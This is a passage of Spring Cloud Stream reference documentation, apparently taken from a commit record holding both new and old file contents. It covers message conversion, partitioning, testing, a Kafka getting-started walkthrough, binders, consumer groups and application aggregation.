method)\n\nWhere _JSON_ represents either a byte array or String payload containing JSON.\nCurrently, Objects may be converted from a JSON byte array or String.\nConverting to JSON always produces a String.\n\n[[mime-types]]\n=== MIME types\n`content-type` values are parsed as media types, e.g., `application\/json` or `text\/plain;charset=UTF-8`.\nMIME types are especially useful for indicating how to convert to String or byte[] content.\nSpring Cloud Stream also uses MIME type format to represent Java types, using the general type `application\/x-java-object` with a `type` parameter.\nFor example, `application\/x-java-object;type=java.util.Map` or `application\/x-java-object;type=com.bar.Foo` can be set as the `content-type` property of an input binding.\nIn addition, Spring Cloud Stream provides custom MIME types, notably, `application\/x-spring-tuple` to specify a Tuple.\n\n[[mime-types-and-java-types]]\n=== MIME types and Java types\n\nThe type conversions Spring Cloud Stream provides out of the box are summarized in the following table:\n\n|===\n|Source Payload |Target Payload |content-type header | content-type | Comments\n\n|POJO\n|JSON String\n|ignored\n|application\/json\n|\n\n|Tuple\n|JSON String\n|ignored\n|application\/json\n|JSON is tailored for Tuple\n\n|POJO\n|String (toString())\n|ignored\n|text\/plain, java.lang.String\n|\n\n|POJO\n|byte[] (java.io serialized)\n|ignored\n|application\/x-java-serialized-object\n|\n\n|JSON byte[] or String\n|POJO\n|application\/json (or none)\n|application\/x-java-object\n|\n\n|byte[] or String\n|Serializable\n|application\/x-java-serialized-object\n|application\/x-java-object\n|\n\n|JSON byte[] or String\n|Tuple\n|application\/json (or none)\n|application\/x-spring-tuple\n|\n\n|byte[]\n|String\n|any\n|text\/plain, java.lang.String\n|will apply any Charset specified in the content-type header\n\n|String\n|byte[]\n|any\n|application\/octet-stream\n|will apply any Charset specified in the content-type header\n\n|===\n\n[[NOTE]]\nConversion applies to payloads that require type conversion.\nFor example, if a module produces an XML string with outputType=application\/json, the payload will not be converted from XML to JSON.\nThis is because the payload at the module's output channel is already a String so no conversion will be applied at runtime.\n\n[[TIP]]\nWhile conversion is supported for both input and output channels, it is especially recommended to be used for the conversion of outbound messages.\nFor the conversion of inbound messages, especially when the target is a POJO, the `@StreamListener` support will perform the conversion automatically.\n\n=== ``@StreamListener` and Message Conversion\n\nThe `@StreamListener` annotation provides a convenient way for converting incoming messages without the need to specify the content type of an input channel.\nDuring the dispatching process to methods annotated with `@StreamListener`, a conversion will be applied automatically if the argument requires it.\n\nFor example, let's consider a message with the String content `{\"greeting\":\"Hello, world\"}` and a `content-type` header of `application\/json` is received on the input channel.\nLet us consider the following application that receives it:\n\n[source,java]\n----\npublic class GreetingMessage {\n\n String greeting;\n\n public String getGreeting() {\n return greeting;\n }\n\n public void setGreeting(String greeting) {\n this.greeting = greeting;\n }\n}\n\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class GreetingSink {\n\n\t\t@StreamListener(Sink.INPUT)\n\t\tpublic void receive(Greeting greeting) {\n\t\t\t\/\/ handle Greeting\n\t\t}\n\t}\n----\n\nThe argument of the method will be populated automatically with the POJO containing the unmarshalled form of the JSON String.\n\n== Inter-Application Communication\n\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating the input and output destinations of adjacent applications.\n\nSupposing that a design calls for the Time Source application to send data to the Log Sink application, you can use a common destination named `ticktock` for bindings within both applications.\n\nTime Source will set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink will set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of a HDFS sink application, all three instances will have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications will have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed via Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (e.g., the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n=== Partitioning\n\n==== Configuring Output Bindings for Partitioning\n\nAn output binding is configured to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorClass` properties, as well as its `partitionCount` property.\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on the above example configuration, data will be sent to the target partition using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression which is evaluated against the outbound message for extracting the partitioning key.\n\n[TIP]\n====\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by setting the property `partitionKeyExtractorClass` to a class which implements the `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` interface.\nWhile the SpEL expression should usually suffice, more complex cases may use the custom implementation strategy.\n====\n\nOnce the message key is calculated, the partition selection process will determine the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the formula `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the key (via the `partitionSelectorExpression` property) or by setting a `org.springframework.cloud.stream.binder.PartitionSelectorStrategy` implementation (via the `partitionSelectorClass` property).\n\nAdditional properties can be configured for more advanced scenarios, as described in the following section.\n\n[NOTE]\n====\nThe Kafka binder will use the `partitionCount` setting as a hint to create a topic with the given partition count (in conjunction with the `minPartitionCount`, the maximum of the two being the value being used).\nExercise caution when configuring both `minPartitionCount` for a binder and `partitionCount` for an application, as the larger value will be used.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is disabled (the default), then the binder will fail to start.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is enabled, new partitions will be added.\nIf a topic already exists with a larger number of partitions than the maximum of (`minPartitionCount` and `partitionCount`), the existing partition count will be used.\n====\n\n===== Configuring Input Bindings for Partitioning\n\nAn input binding is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data need to be partitioned, and the `instanceIndex` must be a unique value across the multiple instances, between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition (or, in the case of Kafka, the partition set) from which it receives data.\nIt is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario which using multiple instances for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Dataflow can simplify the process significantly by populating both the input and output values correctly as well as relying on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder`.\nThis is useful especially for unit testing your microservices.\n\nThe `TestSupportBinder` allows users to interact with the bound channels and inspect what messages are sent and received by the application\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nThe user can also send messages to inbound message channels, so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor.\n\n[source]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = ExampleTest.MyProcessor.class)\n@IntegrationTest({\"server.port=-1\"})\n@DirtiesContext\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n private BinderFactory<MessageChannel> binderFactory;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the example above, we are creating an application that has an input and an output channel, bound through the `Processor` interface.\nThe bound interface is injected into the test so we can have access to both channels.\nWe are sending a message on the input channel and we are using the `MessageCollector` provided by Spring Cloud Stream's test support to capture the message has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name of `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\n== Samples\n\nFor Spring Cloud Stream samples, please refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n== Getting Started\n\nTo get started with creating Spring Cloud Stream applications, visit the https:\/\/start.spring.io[Spring Initializr] and create a new Maven project named \"GreetingSource\".\nSelect Spring Boot version 1.3.4 SNAPSHOT and search or tick the checkbox for Stream Kafka (we will be using Kafka for messaging).\n\nNext, create a new class, `GreetingSource`, in the same package as the `GreetingSourceApplication` class.\nGive it the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.messaging.Source;\nimport org.springframework.integration.annotation.InboundChannelAdapter;\n\n@EnableBinding(Source.class)\npublic class GreetingSource {\n\n @InboundChannelAdapter(Source.OUTPUT)\n public String greet() {\n return \"hello world \" + System.currentTimeMillis();\n }\n}\n----\n\nThe `@EnableBinding` annotation is what triggers the creation of Spring Integration infrastructure components.\nSpecifically, it will create a Kafka connection factory, a Kafka outbound channel adapter, and the message channel defined inside the Source interface:\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\nThe auto-configuration also creates a default poller, so that the `greet()` method will be invoked once per second.\nThe standard Spring Integration `@InboundChannelAdapter` annotation sends a message to the source's output channel, using the return value as the payload of the message.\n\nTo test-drive this setup, run a Kafka message broker.\nAn easy way to do this is to use a Docker image:\n\n[source]\n----\n# On OS X\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \\`docker-machine active\\`` --env ADVERTISED_PORT=9092 spotify\/kafka\n\n# On Linux\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=localhost --env ADVERTISED_PORT=9092 spotify\/kafka\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nThe consumer application is coded in a similar manner.\nGo back to Initializr and create another project, named LoggingSink.\nThen create a new class, `LoggingSink`, in the same package as the class `LoggingSinkApplication` and with the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.annotation.StreamListener;\nimport org.springframework.cloud.stream.messaging.Sink;\n\n@EnableBinding(Sink.class)\npublic class LoggingSink {\n\n @StreamListener(Sink.INPUT)\n public void log(String message) {\n System.out.println(message);\n }\n}\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nTo connect the GreetingSource application to the LoggingSink application, each application must share the same destination name.\nStarting up both applications as shown below, you will see the consumer application printing \"hello world\" and a timestamp to the console:\n\n[source]\n----\ncd GreetingSource\njava -jar target\/GreetingSource-0.0.1-SNAPSHOT.jar --spring.cloud.stream.bindings.output.destination=mydest\n\ncd LoggingSink\njava -jar target\/LoggingSink-0.0.1-SNAPSHOT.jar --server.port=8090 --spring.cloud.stream.bindings.input.destination=mydest\n----\n\n(The different server port prevents collisions of the HTTP port used to service the Spring Boot Actuator endpoints in the two applications.)\n\nThe output of the LoggingSink application will look something like the following:\n\n[source]\n----\n[ main] s.b.c.e.t.TomcatEmbeddedServletContainer : Tomcat started on port(s): 8090 (http)\n[ main] com.example.LoggingSinkApplication : Started LoggingSinkApplication in 6.828 seconds (JVM running for 7.371)\nhello world 1458595076731\nhello world 1458595077732\nhello world 1458595078733\nhello world 1458595079734\nhello world 1458595080735\n----\n","old_contents":"[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n== Introducing Spring Cloud Stream\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications, and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following is a simple sink application which receives external messages.\n\n[source,java]\n----\n@SpringBootApplication\npublic class StreamApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(StreamApplication.class, args);\n }\n}\n\n@EnableBinding(Sink.class)\npublic class TimerSource {\n\n ...\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and\/or output channels.\nSpring Cloud Stream provides the interfaces `Source`, `Sink`, and `Processor`; you can also define your own interfaces.\n\nThe following is the definition of the `Source` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an _input channel_, through which received messages enter the application; the `@Output` annotation identifies an _output channel_, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter; if a name is not provided, the name of the annotated method will be used.\n\nSpring Cloud Stream will create an implementation of the interface for you.\nYou can use this in the application by autowiring it, as in the following example of a test case.\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = StreamApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* Spring Cloud Stream's application model\n* The Binder abstraction\n* Persistent publish-subscribe support\n* Consumer group support\n* Partitioning support\n* A pluggable Binder API\n\n\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output _channels_ injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::SCSt-with-binder.png[width=300,scaledwidth=\"50%\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in standalone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"fat\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle.\n\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-kafka[Kafka], https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-rabbit[Rabbit MQ], https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-redis[Redis], and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-gemfire[Gemfire].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (e.g., the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<_introducing_spring_cloud_stream>> section, setting the application property `spring.cloud.stream.bindings.input.destination` to `raw-sensor-data` will cause it to read from the `raw-sensor-data` Kafka topic, or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can easily use different types of middleware with the same code: just include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder, and even whether to use different binders for different channels, at runtime.\n\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=300,scaledwidth=\"50%\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS.\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer, and allows new applications to be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing this, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a _consumer group_.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.input.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.input.group=hdfsWrite` or `spring.cloud.stream.bindings.input.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=300,scaledwidth=\"50%\"]\n\nAll groups which subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are _durable_.\nThat is, a binder implementation ensures that group subscriptions are persistent, and once at least one subscription for a group has been created, the group will receive messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (e.g., RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nThis prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for _partitioning_ data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (e.g., the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (e.g., Kafka) or not (e.g., RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=300,scaledwidth=\"50%\"]\n\nPartitioning is a critical concept in stateful processing, where it is critiical, for either performance or consistency reasons, to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\n[NOTE]\n====\nTo set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n====\n\n== Programming Model\n\nThis section describes Spring Cloud Stream's programming model.\nSpring Cloud Stream provides a number of predefined annotations for declaring bound input and output channels as well as how to listen to channels.\n\n=== Declaring and Binding Channels\n\n==== Triggering Binding Via `@EnableBinding`\n\nYou can turn a Spring application into a Spring Cloud Stream application by applying the `@EnableBinding` annotation to one of the application's configuration classes.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of Spring Cloud Stream infrastructure:\n\n[source,java]\n----\n...\n@Import(...)\n@Configuration\n@EnableIntegration\npublic @interface EnableBinding {\n ...\n Class<?>[] value() default {};\n}\n----\n\nThe `@EnableBinding` annotation can take as parameters one or more interface classes that contain methods which represent bindable components (typically message channels).\n\n[NOTE]\n====\nIn Spring Cloud Stream 1.0, the only supported bindable components are the Spring Messaging `MessageChannel` and its extensions `SubscribableChannel` and `PollableChannel`.\nFuture versions should extend this support to other types of components, using the same mechanism.\nIn this documentation, we will continue to refer to channels.\n====\n\n==== `@Input` and `@Output`\n\nA Spring Cloud Stream application can have an arbitrary number of input and output channels defined in an interface as `@Input` and `@Output` methods:\n\n[source,java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing this interface as a parameter to `@EnableBinding` will trigger the creation of three bound channels named `orders`, `hotDrinks`, and `coldDrinks`, respectively.\n\n[source,java]\n----\n@EnableBinding(Barista.class)\npublic class CafeConfiguration {\n\n ...\n}\n----\n\n===== Customizing Channel Names\n\nUsing the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source,java]\n----\npublic interface Barista {\n ...\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn this example, the created bound channel will be named `inboundOrders`.\n\n===== `Source`, `Sink`, and `Processor`\n\nFor easy addressing of the most common use cases, which involve either an input channel, an output channel, or both, Spring Cloud Stream provides three predefined interfaces out of the box.\n\n`Source` can be used for an application which has a single outbound channel.\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\n`Sink` can be used for an application which has a single inbound channel.\n\n[source,java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n\n}\n----\n\n`Processor` can be used for an application which has both an inbound channel and an outbound channel.\n\n[source,java]\n----\npublic interface Processor extends Source, Sink {\n}\n----\n\nSpring Cloud Stream provides no special handling for any of these interfaces; they are only provided out of the box.\n\n==== Accessing Bound Channels\n\n===== Injecting the Bound Interfaces\n\nFor each bound interface, Spring Cloud Stream will generate a bean that implements the interface.\nInvoking a `@Input`-annotated or `@Output`-annotated method of one of these beans will return the relevant bound channel.\n\nThe bean in the following example sends a message on the output channel when its `hello` method is invoked.\nIt invokes `output()` on the injected `Source` bean to retrieve the target channel.\n\n[source,java]\n----\n@Component\npublic class SendingBean {\n\n private Source source;\n\n @Autowired\n public SendingBean(Source source) {\n this.source = source;\n }\n\n public void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n===== Injecting Channels Directly\n\nBound channels can be also injected directly:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n private MessageChannel output;\n\n @Autowired\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n output.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\nIf the name of the channel is customized on the declaring annotation, that name should be used instead of the method name.\nGiven the following declaration:\n\n[source,java]\n----\npublic interface CustomSource {\n ...\n @Output(\"customOutput\")\n MessageChannel output();\n}\n----\n\nThe channel will be injected as shown in the following example:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n @Autowired\n private MessageChannel output;\n\n @Autowired @Qualifier(\"customOutput\")\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n customOutput.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n==== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application using either Spring Integration annotations or Spring Cloud Stream's `@StreamListener` annotation.\nThe `@StreamListener` annotation is modeled after other Spring Messaging annotations (such as `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.) but adds content type management and type coercion features.\n\n===== Native Spring Integration Support\n\nBecause Spring Cloud Stream is based on Spring Integration, Stream completely inherits Integration's foundation and infrastructure as well as the component itself.\nFor example, you can attach the output channel of a `Source` to a `MessageSource`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Value(\"${format}\")\n private String format;\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"${fixedDelay}\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(new SimpleDateFormat(format).format(new Date()));\n }\n}\n----\n\nOr you can use a processor's channels in a transformer:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpper();\n }\n}\n----\n\n===== Using @StreamListener for Automatic Content Type Handling\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations (e.g. `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.).\nThe `@StreamListener` annotation provides a simpler model for handling inbound messages, especially when dealing with use cases that involve content type management and type coercion.\n\nSpring Cloud Stream provides an extensible `MessageConverter` mechanism for handling data conversion by bound channels and for, in this case, dispatching to methods annotated with `@StreamListener`.\nThe following is an example of an application which processes external `Vote` events:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nThe distinction between `@StreamListener` and a Spring Integration `@ServiceActivator` is seen when considering an inbound `Message` that has a `String` payload and a `contentType` header of `application\/json`.\nIn the case of `@StreamListener`, the `MessageConverter` mechanism will use the `contentType` header to parse the `String` payload into a `Vote` object.\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers` and `@Header`.\n\n[NOTE]\n====\nFor methods which return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n====\n\n[NOTE]\n====\nIn the case of RabbitMQ, content type headers can be set by external applications.\nSpring Cloud Stream supports them as part of an extended internal protocol used for any type of transport (including transports, such as Kafka, that do not normally support headers).\n====\n\n==== Aggregation\n\nSpring Cloud Stream provides support for aggregating multiple applications together, connecting their input and output channels directly and avoiding the additional cost of exchanging messages via a broker.\nAs of version 1.0 of Spring Cloud Stream, aggregation is supported only for the following types of applications:\n\n* _sources_ - applications with a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Source`\n* _sinks_ - applications with a single input channel named `input`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Sink`\n* _processors_ - applications with a single input channel named `input` and a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Processor`.\n\nThey can be aggregated together by creating a sequence of interconnected applications, in which the output channel of an element in the sequence is connected to the input channel of the next element, if it exists.\nA sequence can start with either a _source_ or a _processor_, it can contain an arbitrary number of _processors_ and must end with either a _processor_ or a _sink_.\n\nDepending on the nature of the starting and ending element, the sequence may have one or more bindable channels, as follows:\n\n* if the sequence starts with a source and ends with a sink, all communication between the applications is direct and no channels will be bound\n* if the sequence starts with a processor, then its input channel will become the `input` channel of the aggregate and will be bound accordingly\n* if the sequence ends with a processor, then its output channel will become the `output` channel of the aggregate and will be bound accordingly\n\nAggregation is performed using the `AggregateApplicationBuilder` utility class, as in the following example.\nLet's consider a project in which we have source, processor and a sink, which may be defined in the project, or may be contained in one of the project's dependencies.\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class SinkApplication {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(SinkModuleDefinition.class);\n\n\t@ServiceActivator(inputChannel=Sink.INPUT)\n\tpublic void loggerSink(Object payload) {\n\t\tlogger.info(\"Received: \" + payload);\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class ProcessorApplication {\n\n\t@Transformer\n\tpublic String loggerSink(String payload) {\n\t\treturn payload.toUpperCase();\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic class SourceApplication {\n\n\t@Bean\n\t@InboundChannelAdapter(value = Source.OUTPUT)\n\tpublic String timerMessageSource() {\n\t\treturn new SimpleDateFormat().format(new Date());\n\t}\n}\n----\n\nEach configuration can be used for running a separate component, but in this case they can be aggregated together as 